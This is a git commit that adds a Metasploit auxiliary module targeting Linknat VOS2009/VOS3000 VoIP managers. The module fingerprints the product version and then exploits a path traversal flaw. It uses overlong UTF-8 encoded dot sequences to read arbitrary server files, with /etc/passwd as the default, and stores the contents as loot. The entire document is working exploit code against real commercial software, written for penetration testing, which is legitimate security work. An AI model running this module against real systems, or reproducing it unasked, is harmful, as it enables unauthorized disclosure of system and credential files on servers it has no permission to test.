add Linknat Vos Manager Traversal

2016-02-15 12:39:40 +08:00 · 2016-02-15 12:39:40 +08:00 · f35230b908
parent b2765a296f
commit f35230b908
1 changed files with 93 additions and 0 deletions
--- a/modules/auxiliary/scanner/http/linknat_vos_traversal.rb
+++ b/modules/auxiliary/scanner/http/linknat_vos_traversal.rb
@ -0,0 +1,93 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Linknat Vos Manager Traversal',
+      'Description' => %q(
+        This module attempts to test whether a file traversal vulnerability
+        is present in version of linknat vos2009/vos3000
+      ),
+      'References' => [
+        ['URL', 'http://www.linknat.com/'],
+        ['URL', 'http://www.wooyun.org/bugs/wooyun-2010-0145458']
+      ],
+      'Author'         => ['Nixawk'],
+      'License'        => MSF_LICENSE))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'The path of Linknat Vos Manager (/chs/, /cht/, /eng/)', '/eng/']),
+        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
+        OptInt.new('TRAVERSAL_DEPTH', [true, 'Traversal depth', 5])
+      ], self.class)
+  end
+
+  def vos_uri(path)
+    full_uri =~ %r{/$} ? "#{full_uri}#{path}" : "#{full_uri}/#{path}"
+  end
+
+  def vos_version
+    case target_uri.to_s
+    when /chs/i
+      js_uri = vos_uri('js/lang_zh_cn.js')
+    when /cht/i
+      js_uri = vos_uri('js/lang_zh_tw.js')
+    when /eng/i
+      js_uri = vos_uri('js/lang_en_us.js')
+    else
+      print_warning("#{full_uri} - Please identify VOS version manually")
+      return
+    end
+
+    res = send_request_cgi('uri' => js_uri)
+    return unless res
+
+    vprint_status("#{js_uri} - HTTP/#{res.proto} #{res.code} #{res.message}")
+
+    return unless res.code == 200
+    res.body =~ /s\[8\] = \"([^"]*)\"/m ? major = $1 : major = nil
+    res.body =~ /s\[169\] = \"[^:]*: ([^"\\]*)\"/m ? minor = $1 : minor = nil
+    "#{major} #{minor}"
+  end
+
+  def run_host(ip)
+    version = vos_version
+    unless version
+      print_error("#{full_uri} - Failed to identify Linknat VOS")
+      return
+    end
+
+    traversal = '/%c0%ae%c0%ae' * datastore['TRAVERSAL_DEPTH']
+    filename = datastore['FILEPATH']
+
+    uri = normalize_uri(target_uri.path, '..', traversal, filename)
+    res = send_request_cgi(
+      'method'  => 'GET',
+      'uri'     => uri
+    )
+
+    if res && res.code == 200
+      path = store_loot(
+        version,
+        'text/plain',
+        ip,
+        res.body,
+        filename)
+      print_good("#{full_uri} - File saved in: #{path}")
+    else
+      print_error("#{full_uri} - Nothing was downloaded")
+    end
+  end
+end